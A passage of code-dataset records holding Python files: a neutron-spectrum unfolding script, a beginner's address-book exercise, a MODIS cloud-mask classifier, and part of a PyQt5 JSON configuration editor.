pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\DRM_SphericalShellSource_1e10nps_Li6_meanTallies.csv')\nspheric_drm = spheric_drm_df.to_numpy()[0:57,1:].astype('float64')\nspheric_drm = normalize(spheric_drm,axis=1,norm='l1')\n\n# Random detector response matrix:\nrandom_drm = np.random.random((10,84))\nrandom_drm = 
normalize(random_drm,axis=1,norm='l1')\n\n###-------------------------------------------------------------------------###\n# Import detector responses #\n###-------------------------------------------------------------------------###\n# Detector response from LLNL's run 1, Cf-252 source at 300cm from PNS. I used\n# only the Li6 values rather than subtracting out the Li7 measurement.\ndr_LLNL_run1_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\DR_Cf252_300cm_Li6.csv')\ndr_LLNL_run1 = dr_LLNL_run1_df.to_numpy()[0:57,1].astype('float64')\n\ndr_LLNL_run1_avg = np.zeros((10))\nfor i in range(10):\n dr_LLNL_run1_avg[i] = (dr_LLNL_run1[i]+dr_LLNL_run1[18-i]+dr_LLNL_run1[19+i]+dr_LLNL_run1[37-i]+dr_LLNL_run1[38+i]+dr_LLNL_run1[56-i])/6\n# dr_LLNL_run1_avg = dr_LLNL_run1_avg/np.linalg.norm(dr_LLNL_run1_avg)\ndr_LLNL_run1_avg = dr_LLNL_run1_avg/sum(dr_LLNL_run1_avg)\n# dr_LLNL_run1 = dr_LLNL_run1/np.linalg.norm(dr_LLNL_run1)\ndr_LLNL_run1 = dr_LLNL_run1/sum(dr_LLNL_run1)\n\n# ###-------------------------------------------------------------------------###\n# # Save a figure for the detector response only ###\n# ###-------------------------------------------------------------------------###\n# fig,ax = plt.subplots()\n# radii = [0,3,6,7,8,10,11,12,13,14]\n# ax.scatter(radii, dr_LLNL_run1_avg, s=10, color='#ff7f0e')\n# ax.errorbar(radii, dr_LLNL_run1_avg, yerr=0.1*dr_LLNL_run1_avg, capsize=5, linestyle=None, color='#ff7f0e')\n# ax.set_ylabel('Fluence Response (normalized)')\n# ax.set_xlabel('TLD depth (cm)')\n# ax.set_ylim((0.01, 0.2))\n# ax.set_title('PNS Detector Response')\n# fig.tight_layout()\n# fig_name = 'Example_PNS_dr.png'\n# fig.savefig(fig_name,dpi=300)\n\n# ###-------------------------------------------------------------------------###\n# # Case 1 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 1: Planar source, depth averaged')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 2 #\n# # DRM: Spheric Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Spherical_Source_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 2: Spherical Source, depth averaged')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,spheric_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_sphericDRMavg_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 3 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 at 
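# sklearn's normalize with norm='l1' (applied to every DRM above) rescales
# each row so it sums to 1. A two-row check with made-up numbers:
import numpy as np
from sklearn.preprocessing import normalize

m = np.array([[2.0, 2.0], [1.0, 3.0]])
normalize(m, axis=1, norm='l1')  # -> [[0.5, 0.5], [0.25, 0.75]]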
90% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 0.9\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod90percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 3: Planar source, depth averaged, guess spectrum at 90%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_gs90percent_LLNLrun1.gif',fig_names)\n\n\n# ###-------------------------------------------------------------------------###\n# # Case 4 #\n# # DRM: Spheric Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 at 90% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 0.9\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Spherical_Source_DRM_avg_GSmod90percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 4: Spheric source, depth averaged, guess spectrum at 90%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,spheric_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_sphericDRMavg_gs90percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 5 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 at 50% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 0.5\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod50percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 5: Planar source, depth averaged, guess spectrum at 50%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_gs50percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 6 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA D2O mod Cf at 100% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA D2O Moderated Cf Spectrum'\n# fig_names = []\n# print('Case 6: Planar source, depth averaged, D2O Moderated Cf guess spectrum at 100%')\n# for i in range(1):\n# run_case(D2O_mod_Cf_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_D2O-mod-Cf_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 7 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA H2O mod PuBe at 100% #\n# ###-------------------------------------------------------------------------###\n# spec_mod 
= 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA H2O Moderated PuBe Spectrum'\n# fig_names = []\n# print('Case 7: Planar source, depth averaged, H2O Moderated PuBe guess spectrum at 100%')\n# for i in range(1):\n# run_case(H2O_mod_PuBe_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_H2O-mod-PuBe_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 8 #\n# # DRM: Random DRM #\n# # Detector Response: LLNL #\n# # Guess Spectrum: Cf Spectrum at 100% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Random_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 8: Random DRM, Cf-252 guess spectrum at 100%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,random_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_randomDRMavg_Cf-252_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 9 #\n# # DRM: Random DRM #\n# # Detector Response: LLNL #\n# # Guess Spectrum: Cf Spectrum at 50% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 0.5\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Random_DRM_avg_GSmod50percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 9: Random DRM, Cf-252 guess spectrum at 100%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,random_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_randomDRMavg_Cf-252_gs50percent_LLNLrun1.gif',fig_names)\n\n###-------------------------------------------------------------------------###\n# This section will use the IAEA Cf-252 spectrum with the DRM to calculate a \n# detector response. 
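# The MAC figure of merit printed by run_case above is the squared cosine
# similarity between the unfolded and true spectra (1.0 means identical
# shape). Worked through with hypothetical 3-bin spectra:
import numpy as np

u = np.array([0.20, 0.50, 0.30])  # unfolded
t = np.array([0.25, 0.45, 0.30])  # true
mac = u.dot(t) ** 2 / (u.dot(u) * t.dot(t))
# mac ~= 0.988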
This response will be compared with the response from\n# LLNL and will be used in MAXED\n###-------------------------------------------------------------------------###\ndr_calc = np.dot(Cf_spec,plane_avg_drm.T)\nspec_mod = 0.5\nmaxiter = 1000\nwhich_drm = 'CalcDR_Planar_Source_DRM_avg_GSmod100percent'\nwhich_spec = 'IAEA Cf-252 Spectrum'\nfig_names = []\nprint('Case 10: Planar source, depth averaged')\nprint(plane_avg_drm.shape)\nprint(dr_calc.shape)\nfor i in range(1):\n run_case(Cf_spec,spec_mod,plane_avg_drm,dr_calc,0.1*dr_calc,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\nmake_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_drCalc_planeDRMavg_gs100percent_LLNLrun1.gif',fig_names)","repo_name":"ZachCondon/PhD","sub_path":"Data/02-MAXED/MAXED_cases.py","file_name":"MAXED_cases.py","file_ext":"py","file_size_in_byte":19739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2200803139","text":"# Write an address book, using dictionaries, where I can query contact info, insert new contact, delete contact information, exit\n# address book program\ndict_1 = {}\nwhile True:\n\n acivity = input('Type q to quit or f to find an info or d to delete info from dict.book or i to insert new info:')\n if acivity == 'q':\n break\n elif acivity == 'f':\n name_dict = input('Input the name to find:')\n if name_dict in dict_1:\n print('The info is:',dict_1[name_dict])\n\n else:\n print('Name is not in dict!!!')\n\n elif acivity == 'i':\n name_dict = input('Input the name to insert: ')\n info_dict = input('Input the info to insert: ')\n dict_1[name_dict] = info_dict\n elif acivity == 'd':\n name_del = input('Input the name to del: ')\n del dict_1[name_del]\n else:\n print('Type q to quit!!!')\n print('You input incorrect letter what to do!!!')\n\n\n\n","repo_name":"ivankoffpavel/BeetRootTasks","sub_path":"Lessons/Lesson 7/Classroom 7/Lesson7_6.py","file_name":"Lesson7_6.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41240194731","text":"import os\nimport numpy as np\nimport sklearn\nfrom sklearn.naive_bayes import GaussianNB\nfrom modis_dataset_gen import modis_dataset_generator\nfrom modis_cld_msk import cloud_mask_generator\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.svm import SVC\n\ndef gaussian_naive_bayes(training_data,training_labels):\n clf = GaussianNB()\n clf.fit(training_data,training_labels)\n y_pred = clf.predict(training_data)\n print(accuracy_score(training_labels,y_pred)*100)\n return\ndef pca_data(training_data,no_components=2):\n pca = PCA(n_components=no_components)\n return pca.fit_transform(training_data)\n\ndef SVM(training_data,training_labels,pca=False):\n clf = SVC()\n if(pca==True):\n training_data = pca_data(training_data)\n clf.fit(training_data,training_labels)\n y_pred = clf.predict(training_data)\n print(accuracy_score(training_labels,y_pred)*100)\n return\n\n#arr = #assume the array is obtained\n#modis_dataset_generator(\"MOD021KM.A2004026.1230.006.2014218105922.hdf\",\"output1.npz\",\"MOD03.A2004026.1230.006.2012274025923.hdf\")\ncurr_data = np.load(\"sample10.npz\")\n\ncurr_image = curr_data[\"arr_0\"]\n\n#labels_file = cloud_mask_generator(\"MOD06_L2.A2004026.1230.006.2014332063358.hdf\",\"label_output.npz\",True)\nlabels_dict = np.load(\"mask10.npz\")\nimage_labels = 
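# The preprocess.py helpers above chain a PCA projection into an SVC fit. A
# self-contained sketch of that pipeline on random stand-in data (the real
# inputs come from the MODIS .npz files):
import numpy as np
from sklearn.decomposition import PCA
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC

X = np.random.random((100, 8))
y = np.random.randint(0, 2, 100)
X2 = PCA(n_components=2).fit_transform(X)
clf = SVC().fit(X2, y)
print(accuracy_score(y, clf.predict(X2)) * 100)  # training accuracy, percent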
labels_dict[\"cloud_mask\"]\n\ngaussian_naive_bayes(curr_image,image_labels)\nSVM(curr_image,image_labels)\nSVM(curr_image,image_labels,True)\n\n#no_components = 2\n\n#print(curr_image.shape)\n\n\n\n\n\n\n\n#def main():\n","repo_name":"chink2016/MAIA_code","sub_path":"MAIA_system/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34012751295","text":"# Std\nimport collections\nimport json\nimport sys\nimport os\n# External\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\n\ntry:\n from PyQt5.QtCore import QStringList\nexcept ImportError:\n QStringList = list\n\nQtCore.QTextCodec.setCodecForLocale(QtCore.QTextCodec.codecForName(\"gb18030\"))\n\n\nTREE_STYLESHEET = ''' \n QTreeWidget::item { border-bottom: 1px solid black;}\n \n QTreeWidget::item:selected { background-color: #366be7; border-color:blue; \n border-style:outset; border-width:0px; color:white; }\n '''\n \nTEXT_STYLESHEET = '''\n background-color: white;\n color: black;\n selection-background-color: #606060; selection-color: white;\n'''\n\nclass JsonView(QtWidgets.QWidget):\n\n def __init__(self):\n \n \n super(JsonView, self).__init__()\n\n #Load file\n self.tree_widget = None\n self.textEdit = QtWidgets.QTextEdit()\n self.TempEdit = QtWidgets.QTextEdit()\n self.textEdit.setStyleSheet(TEXT_STYLESHEET)\n\n filenames = QStringList()\n\n #define widgets\n self.savefile_btn = QtWidgets.QPushButton(\"儲存\")\n self.filenames = filenames\n self.savefile_btn.clicked.connect(self.Save_textEdit)\n self.restart_btn = QtWidgets.QPushButton(\"重啟\")\n self.restart_btn.clicked.connect(self.restart)\n self.open_btn = QtWidgets.QPushButton(\"開啟檔案\")\n self.open_btn.clicked.connect(self.OpenFile)\n self.SaveAs_btn = QtWidgets.QPushButton(\"另存新檔\")\n self.SaveAs_btn.clicked.connect(self.Save_as)\n self.find_lineEdit = QtWidgets.QLineEdit()\n self.find_btn = QtWidgets.QPushButton(\"尋找\")\n self.find_btn.clicked.connect(self.find_word)\n self.settings = []\n\n self.reload_btn = QtWidgets.QPushButton(\"重新讀檔\")\n self.reload_btn.clicked.connect(self.Reload)\n\n # Tree\n self.tree_widget = QtWidgets.QTreeWidget()\n self.tree_widget.setHeaderLabels([\"Key\", \"Value\"])\n self.tree_widget.header().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)##\n selmodel = self.tree_widget.selectionModel()\n selmodel.selectionChanged.connect(self.handleSelection)\n self.tree_widget.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) \n self.tree_widget.customContextMenuRequested.connect(self.contextMenu)\n self.tree_widget.setStyleSheet(TREE_STYLESHEET)\n\n #add widgets to layout\n layout = QtWidgets.QHBoxLayout()\n layout.addWidget(self.tree_widget)\n layout.addWidget(self.textEdit)\n self.table_gbox = QtWidgets.QGroupBox(\"filenames\")\n self.table_gbox.setLayout(layout)\n\n layout1 = QtWidgets.QHBoxLayout()\n layout1.addWidget(self.open_btn)\n layout1.addWidget(self.savefile_btn)\n layout1.addWidget(self.SaveAs_btn)\n layout1.addWidget(self.reload_btn)\n layout1.addWidget(self.restart_btn)\n acts_btn_gbox = QtWidgets.QGroupBox('Actions')\n acts_btn_gbox.setLayout(layout1)\n\n layout3 = QtWidgets.QVBoxLayout()\n layout3.addWidget(self.find_lineEdit)\n layout3.addWidget(self.find_btn)\n layout3.addWidget(acts_btn_gbox)\n layout3.addWidget(self.table_gbox)\n self.setLayout(layout3)\n self.LoadSettings()\n \n def rc(self, rel_path):\n \"\"\"Return full path of resource according to 
rel_path.\"\"\"\n if not hasattr(sys, '_MEIPASS'):\n # for elder PyInstaller.\n rc_path = os.environ.get(\"_MEIPASS2\", os.getcwd())\n else:\n rc_path = getattr(sys, '_MEIPASS', os.getcwd())\n return os.path.join(rc_path, rel_path)\n \n def LoadSettings(self):\n #尋找打包後讀取settings的solution\n filename = self.rc('settings.json')\n # filename = os.path.join(os.environ['_MEIPASS2'], filename)\n if not self.settings:\n try:\n open(filename, 'r')\n self.settings.append(filename)\n except FileNotFoundError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '請先選擇settings檔', QtWidgets.QMessageBox.Yes)\n \n dlg = QtWidgets.QFileDialog()\n dlg.setFileMode(QtWidgets.QFileDialog.AnyFile)\n if dlg.exec_():\n self.settings = dlg.selectedFiles()\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '請確認settings檔案是否無誤', QtWidgets.QMessageBox.Yes)\n sys.exit()\n \n try:\n with open(self.settings[0], 'r') as f:\n settings = json.load(f)\n self.CAN_DELETE = settings['CAN_DELETE'] #可選填\n self.CAN_DELETE_CHILD = settings['CAN_DELETE_CHILD'] #子可以刪掉\n self.CANNOT_EDIT_VALUE = settings['CANNOT_EDIT_VALUE'] #value不可修改\n self.VALID_KEYS = settings['VALID_KEYS']\n self.CONFIG_SET_KEYS = settings['CONFIG_SET_KEYS']\n self.AI_FEATURES_SETS = settings['AI_FEATURES_SETS']\n self.AI_FEATURES_KEYS = settings['AI_FEATURES_KEYS']\n self.ROIOBJ_KEYS = settings['ROIOBJ_KEYS']\n self.VALID_KEYS.extend(self.CONFIG_SET_KEYS)\n self.VALID_KEYS.extend(self.AI_FEATURES_KEYS)\n self.VALID_KEYS.extend(self.ROIOBJ_KEYS)\n self.VALID_KEYS.extend(self.CANNOT_EDIT_VALUE)\n\n self.SETTINGS_KEYS = ['CAN_DELETE', 'CAN_DELETE_CHILD', 'CANNOT_EDIT_VALUE', 'VALID_KEYS', 'CONFIG_SET_KEYS', 'AI_FEATURES_KEYS', 'ROIOBJ_KEYS']\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '請確認settings檔案是否無誤', QtWidgets.QMessageBox.Yes)\n sys.exit()\n def contextMenu(self, point):\n self.menu = QtWidgets.QMenu(self)\n self.menu.addAction('新增child', self.itemInsert)\n self.menu.addAction('刪除', self.itemDelete)\n self.menu.addAction('複製', self.itemDuplicate)\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\n\n def OpenFile(self):\n self.LoadSettings()\n dlg = QtWidgets.QFileDialog()\n dlg.setFileMode(QtWidgets.QFileDialog.AnyFile)\n if dlg.exec_():\n filenames = dlg.selectedFiles()\n self.filenames = dlg.selectedFiles()\n try:\n with open(filenames[0], 'r', encoding='utf-8') as f:\n self.data = json.load(f)\n \n data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(data1)\n self.tree_widget.clear()\n jfile = open(filenames[0])\n jdata = json.load(jfile, object_pairs_hook=collections.OrderedDict)\n root_item = QtWidgets.QTreeWidgetItem([\"Root\"])\n self.recurse_jdata(jdata, root_item)\n self.tree_widget.addTopLevelItem(root_item)\n self.table_gbox.setTitle(filenames[0])\n self.tree_widget.expandAll()\n except json.decoder.JSONDecodeError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '非合規的Json檔', QtWidgets.QMessageBox.Yes)\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n\n def Reload(self):\n try:\n with open(self.filenames[0], 'r', encoding='utf-8') as f:\n self.data = json.load(f)\n data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(data1)\n self.tree_widget.clear()\n jfile = open(self.filenames[0])\n jdata = json.load(jfile, object_pairs_hook=collections.OrderedDict)\n root_item = QtWidgets.QTreeWidgetItem([\"Root\"])\n self.recurse_jdata(jdata, root_item)\n 
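# OpenFile above re-parses the file with object_pairs_hook=OrderedDict so
# the tree lists keys in file order. A minimal illustration (since Python
# 3.7 a plain dict preserves insertion order as well):
import collections
import json

d = json.loads('{"b": 1, "a": 2}', object_pairs_hook=collections.OrderedDict)
list(d)  # ['b', 'a']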
self.tree_widget.addTopLevelItem(root_item)\n self.table_gbox.setTitle(self.filenames[0])\n self.tree_widget.expandAll()\n except json.decoder.JSONDecodeError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '非Json檔案', QtWidgets.QMessageBox.Yes)\n except IndexError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '請先開啟一個檔案', QtWidgets.QMessageBox.Yes)\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n\n def handleSelection(self, selected, deselected):\n for i, index in enumerate(selected.indexes()):\n item = self.tree_widget.itemFromIndex(index)\n column = self.tree_widget.currentColumn()\n edit = QtWidgets.QLineEdit()\n #i=0為key, i=1為value\n # print('i:', i, item.text(i))\n if column == 1 and str(item.text(0)) not in self.CANNOT_EDIT_VALUE:\n old = item.text(column)\n edit.setText(old)\n edit.returnPressed.connect(lambda *_: self.setData(edit, item, column, self.tree_widget, old))\n self.tree_widget.setItemWidget(item, column, edit)\n elif column == 0 and str(item.text(0)) in self.AI_FEATURES_SETS :\n old = item.text(column)\n edit.setText(old)\n edit.returnPressed.connect(lambda *_: self.setData(edit, item, column, self.tree_widget, old))\n self.tree_widget.setItemWidget(item, column, edit)\n # print('SEL: row: %s, col: %s, text: %s' % (\n # index.row(), index.column(), item.text(i)))\n\n def setData(self, edit, item, column, tree, old):\n item.setText(int(column), edit.text())\n key = item.text(0)\n print('key:', key)\n tree.setItemWidget(item, column, None)\n if item.parent():\n self.Case(item, old, edit.text(), key)\n self.data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(self.data1)\n\n def itemInsert(self):\n text, ok = QtWidgets.QInputDialog.getText(self, \"新增Child\", \"輸入child key值:\")\n if ok and text != \"\":\n try:\n if str(text) in self.VALID_KEYS or isinstance(int(text), int):\n if len(self.tree_widget.selectedItems()) > 0:\n QtWidgets.QTreeWidgetItem(self.tree_widget.selectedItems()[0], [text])\n else:\n QtWidgets.QTreeWidgetItem(self.tree_widget, [text])\n except:\n QtWidgets.QMessageBox.warning(self, 'Hint', '未知的key值', QtWidgets.QMessageBox.Yes)\n \n def itemDelete(self):\n for item in self.tree_widget.selectedItems():\n if str(item.text(0)) not in self.CAN_DELETE:\n try:\n if str(self.get_parent(item, 1).text(0)) not in self.CAN_DELETE_CHILD and str(self.get_parent(item, 2).text(0)) != 'ROI' and str(item.parent().text(0)) not in self.SETTINGS_KEYS:\n QtWidgets.QMessageBox.warning(self, 'Hint', '無法刪除', QtWidgets.QMessageBox.Yes)\n return\n except:\n QtWidgets.QMessageBox.warning(self, 'Hint', '無法刪除', QtWidgets.QMessageBox.Yes)\n return\n self.DCase(item, item.text(0))\n self.tree_widget.clear()\n root_item = QtWidgets.QTreeWidgetItem([\"Root\"])\n self.recurse_jdata(self.data, root_item)\n self.tree_widget.addTopLevelItem(root_item)\n self.tree_widget.expandAll()\n self.data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(self.data1)\n \n def itemDuplicate(self):\n for item in self.tree_widget.selectedItems():\n if str(item.parent().text(0)) == 'config_set':\n content = self.data['config_set'][int(item.text(0))]\n self.data['config_set'].append(content) \n elif str(item.parent().text(0)) == 'AI_features':\n text, ok = QtWidgets.QInputDialog.getText(self, \"複製\", \"輸入key值:\")\n if ok and text != \"\":\n content = self.data['config_set'][int(self.get_parent(item, 2).text(0))]['AI_features']\n if str(text) not in self.VALID_KEYS:\n 
QtWidgets.QMessageBox.warning(self, 'Hint', '未知的Key值', QtWidgets.QMessageBox.Yes)\n return\n try:\n if content[str(text)]:\n QtWidgets.QMessageBox.warning(self, 'Hint', 'Key值已存在', QtWidgets.QMessageBox.Yes)\n return\n except Exception as e:\n print(e)\n content[str(text)] = content.copy()[item.text(0)]\n else:\n QtWidgets.QMessageBox.warning(self, 'Hint', '只有config_set和AI_features底下的child可被複製', QtWidgets.QMessageBox.Yes)\n return\n self.data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(self.data1)\n self.Save_textEdit()\n self.Reload()\n \n def Case(self,item, old, new, key):\n #讓key_set可改\n \n try:\n print('parent:', item.parent().text(0), old, new)\n \n if str(old) in self.AI_FEATURES_SETS:\n if str(new) in self.AI_FEATURES_SETS:\n AI_F = self.data['config_set'][int(self.get_parent(item, 2).text(0))]['AI_features']\n AI_F[str(new)] = AI_F.pop(str(old))\n return\n \n if str(item.parent().text(0)) in self.SETTINGS_KEYS:\n try:\n if self.data[str(self.get_parent(item, 1).text(0))][int(key)] is not None:\n self.data[str(self.get_parent(item, 1).text(0))][int(key)] = str(new)\n except IndexError:\n self.data[str(self.get_parent(item, 1).text(0))].append(str(new))\n return\n \n if str(key) == 'switch':\n self.data['switch'] = str(new)\n return\n \n if key in self.CONFIG_SET_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 1).text(0))]\n \n if str(key) == 'dps':\n content[str(key)] = int(new)\n \n else:\n content[str(key)] = str(new)\n \n return\n \n if key in self.AI_FEATURES_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 3).text(0))]\n AI_F = content['AI_features']\n try:\n AI_F_C = AI_F[str(item.parent().text(0))]\n if AI_F_C[str(key)] is not None:\n if str(key) == 'GPU_Index':\n AI_F_C[str(key)] = int(new)\n else:\n AI_F_C[str(key)] = str(new)\n print('done-2')\n except Exception as e:\n print(e)\n AI_F_C = AI_F[str(item.parent().text(0))]\n AI_F_C[str(key)] = str(new)\n \n return\n\n if key in self.ROIOBJ_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(item.parent().text(0))]\n try:\n if ROIObj[str(key)] is not None:\n ROIObj[str(key)] = str(new)\n print('done-3')\n except:\n ROIObj[str(key)] = str(new) \n return\n\n if str(self.get_parent(item, 2).text(0)) == 'ROI':\n #ROIObj裡的ROI\n try:\n content = self.data['config_set'][int(self.get_parent(item, 7).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 5).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(self.get_parent(item, 3).text(0))]\n ROI = ROIObj['ROI'][int(item.parent().text(0))]\n try:\n if ROI[int(key)] is not None:\n ROI[int(key)] = float(new) \n print('done-4')\n except IndexError:\n ROI.append(float(new))\n except IndexError:\n ROI = ROIObj['ROI']\n ROI.append([float(new)])\n #外面的ROI\n except ValueError:\n try:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n ROI = AI_F_C['ROI'][int(item.parent().text(0))]\n try:\n if ROI[int(key)] is not None:\n ROI[int(key)] = float(new)\n print('done-5')\n except Exception as e:\n ROI.append(float(new))\n except IndexError:\n ROI = AI_F_C['ROI']\n ROI.append([float(new)]) \n return\n \n if str(self.get_parent(item, 2).text(0)) == 'Threshold':\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n 